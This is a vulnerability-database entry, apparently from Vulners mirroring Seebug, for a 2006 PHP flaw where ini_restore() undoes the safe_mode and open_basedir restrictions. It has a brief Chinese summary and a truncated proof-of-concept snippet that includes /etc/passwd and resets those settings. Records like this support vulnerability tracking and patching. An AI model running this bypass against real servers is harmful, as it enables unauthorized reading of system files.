Lucene search
K

PHP Ini_Restore() Safe_Mode及Open_Basedir限制绕过漏洞

🗓️ 25 Oct 2006 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 16 Views

PHP Ini_Restore() Safe_Mode及Open_Basedir限制绕过漏洞. PHP存在配置漏洞,可能被绕过安全限制。攻击者利用ini_restore()函数绕过安全设置。厂商已发布升级补丁

Code

                                                - ---
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
ech
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Oct 2006 00:00Current
7.1High risk
Vulners AI Score7.1
16